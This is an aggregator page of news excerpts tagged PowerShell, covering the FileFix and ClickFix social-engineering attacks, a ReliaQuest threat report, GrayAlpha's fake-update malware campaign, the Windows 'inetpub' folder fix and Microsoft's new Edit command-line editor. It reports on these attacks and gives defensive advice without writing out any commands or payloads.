Latest news with #PowerShell
Tom's Guide
5 days ago
- Tom's Guide
New FileFix attack brings ClickFix social engineering to Windows File Explorer — how to stay safe
Developed by cybersecurity researcher, mr. d0x, a FileFix attack is a new version of the ever popular ClickFix social engineering tool. For those unfamiliar with ClickFix, it tricks users into executing malicious commands by convincing them that they need to 'fix' something in order to complete a task on their machines. As reported by BleepingComputer, this new FileFix method uses the Windows File Explorer address bar instead. Mr.d0x not only discovered the new method but has demonstrated that it can be used in attacks to target company employees via the same social engineering techniques that have proven highly successful with ClickFix. ClickFix attacks, which have surged in popularity recently, are browser-based and use a variety of tactics to get victims to click on a button in their browser that will copy a command to their Windows clipboard. The victim is then told to paste the command into PowerShell or prompted to perform an additional command in order to 'fix' the issue. This is frequently seen as a reCAPTCHA or an error that needs to be corrected via the Win+R Run Dialog. It has proven to be an extremely effective malware tool, used to spread dangerous infostealers and launch ransomware attacks. The FileFix update created by mr.d0x is similar to a typical ClickFix attack but pastes the command into Windows File Explorer, which many users are more comfortable using. File Explorer can also execute operating system commands which means it has a functional upload feature; the 'trick' portion of the attack is that it no longer requires an error or an issue as a lure and may simply appear as a notification for a shared file that the user needs to locate through File Explorer. FileFix is a phishing page that includes an 'Open Fixe Explorer' button that will launch File Explorer through the file upload functionality and copy the PowerShell command to the clipboard. The fake path is initially seen in the Fixe Explorer address bar, which hides the malicious command and then executes it. Get instant access to breaking news, the hottest reviews, great deals and helpful tips. The ClickFix tactic that's currently being used in more and more in attacks is working due to the fact that it's able to bypass the best antivirus software and many other security tools. The reason for this is that victims end up doing most of the heavy lifting themselves as the hackers behind this and similar campaigns use social engineering to coerce them into taking action. The hackers behind this and similar campaigns use your preexisting knowledge and online habits to get you to do something you otherwise normally wouldn't. They might also use a sense of urgency to get you to visit one of the malicious sites used in this campaign. If you do see a verification pop-up with instructions, close the website immediately and whatever you do, don't interact with it or follow its instructions. Being asked to open a Terminal or Command Prompt window on your computer is a major red flag. However, not everyone is as tech savvy which is why you should share what you've learned with both older and younger family members, friends and colleagues to help keep them safe, too.
Techday NZ
19-06-2025
- Techday NZ
ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base. ClickFix and social engineering tactics One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics." Lateral movement and initial access trends Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems." Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors. MSHTA on the rise for defence evasion MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details. Changes in ransomware operations The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders." Impact on industry sectors The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign. Malware trends and threat actor activity The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments. Emergence of Scattered Spider Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack." Recommendations and defensive measures ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
Arabian Post
16-06-2025
- Business
- Arabian Post
GrayAlpha Weaponises Fake Browser Updates to Drop PowerNet Loader
Security researchers have uncovered a wave of attacks orchestrated by GrayAlpha, a cybercriminal operation linked to the FIN7 group, exploiting cloned browser update pages to install a custom PowerShell loader dubbed PowerNet and ultimately deliver NetSupport RAT malware. Infrastructure analysis confirms the use of fake browser-updates, counterfeit 7‑Zip download sites, and a previously unreported Traffic Distribution System called TAG‑124 as delivery mechanisms. The initial compromise begins when victims visit compromised sites or encounter malvertising and are redirected to fabricated update pages mimicking legitimate services like Google Meet, SAP Concur, LexisNexis and Advanced IP Scanner. Sophisticated JavaScript fingerprinting scripts capture system details before transitioning users to download payloads via URLs such as / These downloads deploy PowerNet—a custom PowerShell loader designed to unpack and execute NetSupport RAT in memory. Recorded Future's Insikt Group analysis traced overlapping infection paths active since April 2024. While each vector—fake updates, counterfeit 7‑Zip sites, and TAG‑124 TDS—was employed in tandem, only the bogus 7‑Zip pages remained active by mid‑June 2025, with new domains registered as recently as April 2025. The study also cites 'MaskBat,' a second custom loader resembling FakeBat malware that carries GrayAlpha-specific code strings. ADVERTISEMENT The investigation highlights the group's use of bullet‑proof hosting services, primarily Stark Industries Solutions, with additional infrastructure through HIVELOCITY and HIP‑hosting. These muddy their digital footprint while evading takedown attempts. The misuse of TAG‑124 TDS is particularly notable, marking its first known public disclosure and demonstrating growing sophistication in chaining infection methods. Analysts caution that these tactics emulate FIN7's modus operandi—highly targeted, multi-stage campaigns with advanced tooling. FIN7 has conducted cybercrime operations since at least 2013, notably targeting retail, hospitality and finance sectors. It remains structured like a corporate entity, employing specialised teams for malware creation, phishing, money laundering and logistics. In light of these threats, cybersecurity experts recommend stringent application allow‑listing, enhanced employee training to spot deceptive update prompts or malvertising, and deployment of YARA rules and network intel indicators capable of identifying PowerNet, MaskBat and NetSupport RAT activity. Organisations are also urged to actively monitor web infrastructure and domain registrations linked to TDS TAG‑124 campaigns. This campaign underscores a growing trend among financially motivated cyber actors: increasingly professional operations employing deceptive surface-level strategies to deliver heavyweight payloads. While infection surface varies—browser updates, download portals or redirect chains—the end goal remains consistent: persistence via NetSupport RAT, enabling remote access, surveillance, and data exfiltration.
Forbes
06-06-2025
- Forbes
Microsoft Issues Critical Windows Update—Do Not Delete This
You have been warned — do not hit delete. NurPhoto via Getty Images You won't like this. If you're at risk from this Windows security vulnerability, the fix is a nightmare unless you're a fairly expert user. That's not ideal, and it's all down to an update quietly installed on your PC without explanation in April. You may recall the awkward saga of the 'inetpub' folder and 'Microsoft's confusing messaging on deleting or not deleting this mysterious folder on your PC that could leave you and your PC at risk.' Plenty of users deleted the folder that suddenly turned up. 'After installing this update or a later Windows update,' Microsoft later explained, the new folder will appear on your device. 'This folder should not be deleted.' This empty folder, Windows Latest explains, 'is typically associated with Internet Information Services (IIS), which is a native Windows service that allows developers to host websites or apps on Windows 11.' The empty folder appeared without explanation. 'Some of us assumed that it's a bug with the cumulative update and deleted the folder.' Now we have news of an actual fix. 'If you deleted the 'inetpub' folder, created after Windows April 2025 updates,' Windows Latest warns, 'you need to immediately bring it back.' You can turn on the IIS service or 'use a new PowerShell script.' Only after all those deletions did the explanation come. The 'inetpub' folder 'is created as part of a security patch for CVE-2025-21204,' Windows Latest says, 'and it doesn't matter whether IIS is turned on or not. It'll show up, and you're not supposed to delete it, and if you deleted it, please bring it back, according to Microsoft.' You can turn on IIS, 'however, that's something most people don't want to do because IIS also creates additional folders, which are not required unless you're a developer. Instead you can run Microsoft's newly released PowerShell script. First ensure you're logged in as an Administrator, then you can follow Windows Latest's instructions: Mostly users are unlikely to go through this, which will leave them at risk. 'As per Microsoft, without the folder and its correct ACLs (Access Control Lists), you remain exposed to potential privilege escalation or unauthorized access.'
Yahoo
04-06-2025
- Business
- Yahoo
Microsoft to Add Lightweight Command-Line Text Editor 'Edit' to Windows 11
Microsoft is preparing to bring a new command-line text editor called Edit to Windows 11, which is made for users who want a simple and lightweight tool for editing text files. Edit is now available on GitHub for anyone to download, and Microsoft says it will soon be included by default in Windows 11 as the primary text editor for command-line environments such as PowerShell and Command Prompt, as reported by Windows Latest. But this does not mean Edit will replace Notepad; instead, it will be accessible directly from the Terminal by typing 'edit.' Edit is made to be an easy and efficient option, with a file size of just a couple of hundred KBs. It lets users perform basic text editing tasks, like opening and saving files, finding and replacing, word wrapping, and jumping to specific lines. It's ideal for users who want a minimal tool that works entirely within the Terminal, without the extra functions and size of more complex editors like Notepad or Word. Microsoft says Edit fills a gap for those who quickly view or change text files. To use Edit now, users can download it from GitHub or install it through the Winget package manager.
